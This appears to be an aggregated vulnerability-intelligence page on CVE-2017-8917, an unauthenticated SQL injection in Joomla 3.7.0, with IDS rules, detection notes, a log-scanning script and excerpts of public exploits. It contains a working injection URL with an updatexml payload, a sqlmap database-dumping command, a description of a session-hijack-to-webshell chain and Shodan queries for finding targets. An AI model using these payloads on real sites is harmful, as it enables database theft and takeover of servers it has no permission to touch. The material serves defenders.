CVE-2017-8917
Published: 2017-05-17
CVE-2017-8917: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
Priority P183 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 99.83% (100.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | — | — |
Detection & IOCs
url: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
command: sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
url: {{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)"; flow:established,to_server; http.uri; content:".php?"; content:"option="; content:"view="; content:"layout="; content:"&list[fullordering]="; fast_pattern; pcre:"/&list\[fullordering\]=(?:[a-zA-Z0-9])*[\x22\x27\x28]/i"; reference:url,blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html; reference:cve,2017-8917; classtype:web-application-attack; sid:2024342; rev:6; metadata:affected_product Joomla, attack_target Web_Server, created_at 2017_06_01, cve CVE_2017_8917, deployment Perimeter, performance_impact Low, signature_severity Major, updated_at 2024_03_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- The vulnerable parameter is `list[fullordering]` in a GET request to `/index.php` with `option=com_fields`, `view=fields`, and `layout=modal`. Detection should focus on anomalous values in this parameter (quotes, parentheses, SQL keywords).
- The Metasploit module exploits the SQLi to extract an active administrator session cookie from the `_session` table (userid!=0), then hijacks it to authenticate as admin and write a PHP webshell via the template editor. Monitor for unexpected PHP file creation in Joomla template directories following a 500 response on the com_fields endpoint.
- Error-based SQLi payloads using UPDATEXML and CONCAT are characteristic of this exploit. An HTTP 500 response containing garbled XML error output with embedded data is a strong indicator of successful exploitation.
- Time-based blind SQLi using SLEEP() in the `list[fullordering]` parameter can be detected by monitoring for abnormally delayed HTTP responses (e.g., 5+ seconds) on the com_fields endpoint.
- Nuclei template detection: match the MD5 hash of a known numeric value reflected in the HTTP response body after injecting `updatexml(0x23,concat(1,md5(<num>)),1)` into `list[fullordering]`.
- Shodan/FOFA queries can identify exposed Joomla instances for proactive asset discovery: `http.component:"Joomla"` or `body="joomla! - open source content management"`.
- The vulnerability was introduced specifically in Joomla 3.7.0 with the new `com_fields` component and was fixed in 3.7.1. Only Joomla instances running exactly 3.7.0 are vulnerable; earlier versions do not have the com_fields component.
- The Metasploit RCE chain requires an active logged-in Administrator or Super User session to exist in the database at the time of exploitation; if no admin is logged in, session hijacking will fail and RCE will not be achievable.
- The SQLi is unauthenticated and exploitable without any prior login, making it accessible to any remote attacker with network access to the Joomla instance.
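The log-side counterpart of the detection notes above, as an added example that is not part of the original page or of any listed tool: it percent-decodes each request, applies the quote/parenthesis/keyword check to `list[fullordering]` on com_fields requests, and attaches the HTTP 500 and slow-response signals. The log format (combined log with request time in seconds appended), the keyword list, the function names and the sample lines are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed format: combined access log with request time (seconds) as the last field.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>\d+(?:\.\d+)?)$')
METACHARS = re.compile(r'["\'(]')  # the characters the Suricata rule's pcre looks for
SQL_WORDS = re.compile(r'\b(?:updatexml|concat|sleep|select|union)\b', re.I)  # illustrative list
SLOW_SECONDS = 5.0  # threshold taken from the "5+ seconds" note

# Constructed sample lines (documentation IP ranges), not real traffic.
# "a.title ASC" stands in for an ordinary ordering value (assumption).
BASE = '/index.php?option=com_fields&view=fields&layout=modal&'
TAIL = 'HTTP/1.1" {} 5120 "-" "Mozilla/5.0" {}'
SAMPLE = [
    f'192.0.2.10 - - [01/Jun/2017:10:00:00 +0000] "GET {BASE}list[fullordering]=a.title%20ASC ' + TAIL.format(200, '0.120'),
    f'198.51.100.7 - - [01/Jun/2017:10:00:05 +0000] "GET {BASE}list[fullordering]=updatexml%27 ' + TAIL.format(500, '0.084'),
    f'203.0.113.5 - - [01/Jun/2017:10:00:09 +0000] "GET {BASE}list%5Bfullordering%5D=sleep%285%29 ' + TAIL.format(200, '5.310'),
    '192.0.2.11 - - [01/Jun/2017:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=1 ' + TAIL.format(200, '0.050'),
]

def check_line(line):
    """Return (ip, reasons) for a suspicious com_fields request, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D
    # and %27 are inspected in decoded form.
    qs = parse_qs(urlsplit(m['target']).query, keep_blank_values=True)
    if 'com_fields' not in qs.get('option', []):
        return None
    reasons = set()
    for value in qs.get('list[fullordering]', []):
        if METACHARS.search(value):
            reasons.add('metachar')
        if SQL_WORDS.search(value):
            reasons.add('sql-keyword')
    if not reasons:
        return None  # ordinary ordering value, nothing to report
    if m['status'] == '500':
        reasons.add('http-500')       # error-based extraction surfaces as a 500
    if float(m['rt']) >= SLOW_SECONDS:
        reasons.add('slow-response')  # consistent with time-based blind probing
    return m['ip'], sorted(reasons)

def scan(lines):
    return [hit for hit in map(check_line, lines) if hit]

if __name__ == '__main__':
    for ip, reasons in scan(SAMPLE):
        print(ip, ', '.join(reasons))
```

The 500 and latency signals are only attached to requests that already carry a suspicious parameter value, so a slow or failing page on its own does not raise a finding.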
CVSS provenance
nvd · v3.0 · 9.8 CRITICAL · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
Suricata
ET WEB_SPECIFIC_APPS Joomla 3.7.0 - Sql Injection (CVE-2017-8917)
suricata·2017-06-01·CVSS 9.8
Exploit-DB
Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
exploitdb·2018-03-29
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Joomla Component Fields SQLi Remote Code Execution',
'Description' => %q{
This module exploits a SQL injection vulnerability in the com_fields
component, which was introduced to the core of Joomla in version 3.7.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mateus Lino', # Vulnerability discovery
'luisco100 ' # Metasploit module
],
'References' =>
[
[ 'CVE', '2017-8917' ], # SQLi
[ 'EDB', '42033' ],
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The pa
Exploit-DB
Joomla! 3.7.0 - 'com_fields' SQL Injection
exploitdb·2017-05-19·CVSS 9.8
---
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter rep
Metasploit
Joomla Component Fields SQLi Remote Code Execution
metasploit
This module exploits a SQL injection vulnerability in the com_fields component, which was introduced to the core of Joomla in version 3.7.0.
Nuclei
Joomla! <3.7.1 - SQL Injection
nuclei·CVSS 9.8
Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2017-8917
info:
  name: Joomla! <3.7.1 - SQL Injection
  author: princechaddha
  severity: critical
  description: |
    Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.
  remediation: |
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
arXiv
Ancora: Accurate Intrusion Recovery for Web Applications
arxiv_fulltext·2026-01-02
Authors: Yihao Peng (ORCID 0000-0002-9190-531X), Graduate Student Member, IEEE, Biao Ma (ORCID 0009-0001-9372-1020), Hai Wan (ORCID 0000-0002-9608-5808), Xibin Zhao (ORCID 0000-0002-6168-7016), Senior Member, IEEE. Yihao Peng and Biao Ma contributed equally to this work.
Yihao Peng, Biao Ma, Hai Wan, and Xibin Zhao are with the Beijing National Research Center for Information Science and Technology (BNRist), Key Laboratory for Information System Security, Ministry of Education (KLISS), School of Software, Tsinghua University, Beijing 100084, China.
IEEE Transactions on Dependable and Secure Computing, 2025
## Abs
- http://www.securityfocus.com/bid/98515
- http://www.securitytracker.com/id/1038522
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://www.exploit-db.com/exploits/42033/
- https://www.exploit-db.com/exploits/44358/
Published: 2017-05-17